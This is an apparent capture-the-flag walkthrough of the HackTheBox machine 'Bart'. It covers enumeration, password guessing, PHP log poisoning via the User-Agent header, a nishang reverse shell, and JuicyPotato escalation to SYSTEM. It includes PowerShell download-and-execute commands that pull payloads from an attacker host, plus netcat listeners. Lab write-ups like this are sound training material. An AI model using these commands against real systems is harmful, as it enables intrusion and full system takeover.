Bart HTB

IP

10.10.10.81

Initial Nmap scan

sudo nmap -sV -sC -A -oA inital_nmap 10.10.10.81

Full Nmap scan

nmap -sV -p- -oA full_nmap_scan 10.10.10.81
  • Nothing new

Ports

80: HTTP

  • we can see nmap did not follow the redirect lets add domain to our hosts file

sudo vi /etc/hosts

to exit out of vim (just in case)

esc #esc button
:wq # write and quit

Now we have added to the hosts file let direct our attention to port 80 http

Port 80 HTTP

when we first land on the page if we look at wappalayzer we can see the technologies the web server is using

from what we can tell this web server

  • uses WordPress version 4.8.2

  • Has a MySQL database

  • Uses PHP

  • is an IIS server (Windows)

First thing let's perform some directory busting

feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.81 -x php -o dirs.txt

lets this run in the background

quick note

  • While running ferox buster I noticed I started to get a lot of 200 status codes and all of them resulted in the following

  • Dont get me wrong I love mercats as much as the next person, but i dont want this showing up in my results so lets modify our command a touch

feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.81 -x php -C 200 -o dirs.txt
  • -C: meaning exclude status code 200

  • let's let this run for a bit and come back to it later

Looking at the home page's source we can see some interesting notes left behind

We can make out some possible usernames

Harvey Potter
Developer@BART
h.potter@bart.htb

looking through the main web page we can see a few other staff members

Samantha Browm: CEO@bart
Daniel Simmons
Robert Hilton
Jane Doe: Developer@FluffyUnicorns

feroxbuster found a directory

/monitor/

so far we now

  • PHP Server Monitor v3.2.1

couldn't find any default creds but if we look at the forgotten password section and submit admin

we can see what particular users are on the system

let's refer to the staff we found on the web page and the page's source

woohoo! we found a user

if we try Harvey's last name potter we are authenticated

Looks like it worked but we'll have to add the subdomain to our hosts file

Now we can log back in with Harvey's credentials

harvey: potter

if we look at the Servers tab we can see another subdomain

for good measures let's add this to our host's file

When we navigate to the

http://internal-01.bart.htb/

we are greeted with another login screen

as you can probably guess Harvey's creds dont work, we need a password with a minimum of eight characters

let's perform further directory busting

feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://internal-01.bart.htb/simple_chat/ -x php  -o dirs.txt

Keep getting server issues most likely because we are not authenticated

Lets try some common creds with harvey

  • it actually worked

we found the creds for the login

harvey: Password1

When we log into the chat we can see the following

From what is discussed there seems to be development code on the server if we look at the page source

this looks promising

let's navigate to

http://internal-01.bart.htb/log/log.php?filename=log.txt&username=harvey

My first thought looks pretty static but playing around with URL parameters

we do get a response back

Wonder if we can add any further functionality to it

Let's use burp and catch a request

Looking at the request, I did try to modify both the filename and username parameters to see if I could inject php code but with no luck

but we can successfully inject php code within the user-agent

before we send this off we want to send it through repeater, Now we can add the parameter cmd= and execute commands on the target system

we now have code execution on the target machine

Establishing a shell on the target system

alright lets set up our shell

  1. we will use the nishang repo

https://github.com/samratashok/nishang.git
  1. copy our reverse shell script into our working directory

cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 ./rev.ps1
  1. edit our Invoke-PowerShellTcp.ps1 script

we just added this little snippet so when the PowerShell script is executed it will automatically connect to our local machine

  1. set up our python server

python3 -m http.server 9010
  1. set up our netcat listener

nc -lvnp 9001
  1. from burp let's pick up our rev.ps1

Quick tip

  • Once you have typed your PowerShell command out highlight the command and press ctrl u to URL encoded it

  1. we have a shell on the system

Privilege escalation Via iusr

let's run systeminfo and feed it to Wes to see if we can find any exploits

copy and paste the output to a file on our local machine

update wes

python3 /opt/wesng/wes.py --update

let's feed it to Wes

python3 /opt/wesng/wes.py systeminfo.txt > possible_exploits

Found a number of exploits, but we will keep these in our back pocket in case we can't find anything

let's check for users on the system

net users

lets check our privileges

whoami /priv

as we can see SeImpersonatePriviege is enabled meaning we have a high chance of successfully using juicy potato to spawn a shell as nt authority.

alright let's download some fresh potatoes and get to it

Once we have the juicy potato executable on our local machine let's download it onto the target machine

  1. start a python3 server

python3 -m http.server 9010
  1. well use powershell to retrieve the potato

(new-object net.webclient).downloadfile('http://10.10.16.8:9010/jp.exe', 'C:\Users\Public\Downloads\jp.exe')

we should have our jp.exe (JuiceyPotato.exe) within the downloads directory

lets execute jp.exe and see what parameters we need to set

  • -t createprocess call: we can do both

  • -p program to launch: we will execute a shell.bat file

  • -l Com Sever listen port: this can be say port 4444 on the local host

  • -c CLSID Since we now we are working on a Windows 10 pro machine we can use the following repo to test possible CLSIDs, well use the {7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}

Alright let's get our reverse shell ready

  • well just cp rev.ps1 rev2.ps1

  • change the port for connection

Now we want to create a shell.bat file which will run our rev.ps1 , it should contain

powershell -c iex(new-object net.webclient).downloadstring('http://10.10.16.8:9010/rev2.ps1')

Lets download our shell.bat onto the target machine

  • set up a python server

python3 -m http.server 9010
  • From the target machine

(new-object net.webclient).downloadfile('http://10.10.16.8:9010/shell.bat', 'C:\Users\Public\Downloads\shell.bat')

  • start a Netcat listener

nc -lvnp 9002

alright we should have the necessary files on the target system

Let's execute jp.exe

./jp.exe -t * -p shell.bat -l 4444 -c "{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}"

we have a shell as nt authority\system

Last updated